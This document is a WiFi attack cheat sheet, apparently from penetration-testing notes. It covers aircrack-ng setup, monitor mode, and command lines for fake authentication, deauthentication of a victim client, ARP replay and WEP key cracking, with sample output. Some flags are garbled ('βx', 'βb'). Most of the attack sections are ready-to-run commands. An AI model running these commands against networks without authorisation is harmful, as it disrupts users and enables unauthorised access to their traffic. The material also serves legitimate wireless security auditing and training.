Wifi - Basics
Tools
- aircrack-ng/aircrack-ng - WiFi security auditing tools suite
- kimocoder/wifite2 - Fork of wifite2
- derv82/wifite2 - Rewrite of the popular wireless network auditor, "wifite". Development stopped in 2018.
- derv82/wifite - Wifite is an automated wireless attack tool.
Linux Wireless Basics
AP_MAC="XX:XX:XX:XX:XX" # BSSID
VICTIM_MAC="XX:XX:XX:XX:XX" # VIC
ATTACKER_MAC="XX:XX:XX:XX:XX" # MON
AP_SSID="wifibox" # ESSID
SRC_ADDR="192.168.1.1"
DST_ADDR="192.168.1.255"
# driver install
apt install realtek-rtl88xxau-dkms
# network card recon
iwconfig
iw list
dmesg | grep 8187 # alfa card
# Increase Wi-Fi TX Power
iw reg set B0
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
# find SSID and channel
iw dev wlan0 scan | grep SSID
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
iwlist wlan0 scanning | egrep "ESSID|Channel"
# monitor mode - start
airmon-ng start wlan0
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
* Manual 1: iw dev wlan0 interface add mon0 type monitor
* Manual 2: iwconfig wlan0 mode monitor channel 3
ifconfig mon0 up
# monitor mode - stop
airmon-ng stop mon0
* Manual 1: iw dev wlan0 interface del mon0
* Manual 2: iwconfig wlan0 mode managed
Aircrack-ng Essentials
-
Check and kill processes that could interfere with our monitor mode
airmon-ng check airmon-ng check kill pkill dhclient pkill dhclient3 pkill wpa_supplicant -
List access points
airodump-ng mon0 airodump-ng mon0 -c 3 # only on a particular channel e.g: 3 airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic -
Get and set mac address
macchanger -s mon0 macchanger --show mon0 -
Check aireplay card compatibility
aireplay-ng -9 mon0 -> test injection aireplay-ng -9 -i wlan1 mon0 -> test card to card injection
Aircrack compatibility
- Determine the chipset and driver of a wireless card
- Known compatible cards: Alfa AWUS036H / TPLink WN722
Fake authentication attack
:warning: use it before each attack
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
# fake authentication = no arp
aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
* Might need a real $ATTACKER_MAC, observe traffic using airodump
> Association successful! :-)
# fake authentication for picky AP
# Send keep-alive packets every 10 seconds
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
# might need to fake your MAC ADDRESS first
Deauthentication attack
Force ARP packet to be sent.
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
* -0 : 1 deauthentication, 0 unlimited
> Sending 64 directed DeAuth.
ARP Replay Attack
Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
* ATTACKER_MAC if fake authentication launched
* CONNECTED_MAC if a client is associated
# -x 1000 -n 1000
# aireplay-ng -3 βx 1000 βn 1000 βb $AP_MAC -h $ATTACKER_MAC wlan0mon
# wait for ARP on the network
# alternatively you can de-auth some clients
aircrack-ng βb <BSSID> <PCAP_of_FileName>
aircrack-ng -0 wep1.cap
* -0 : colored output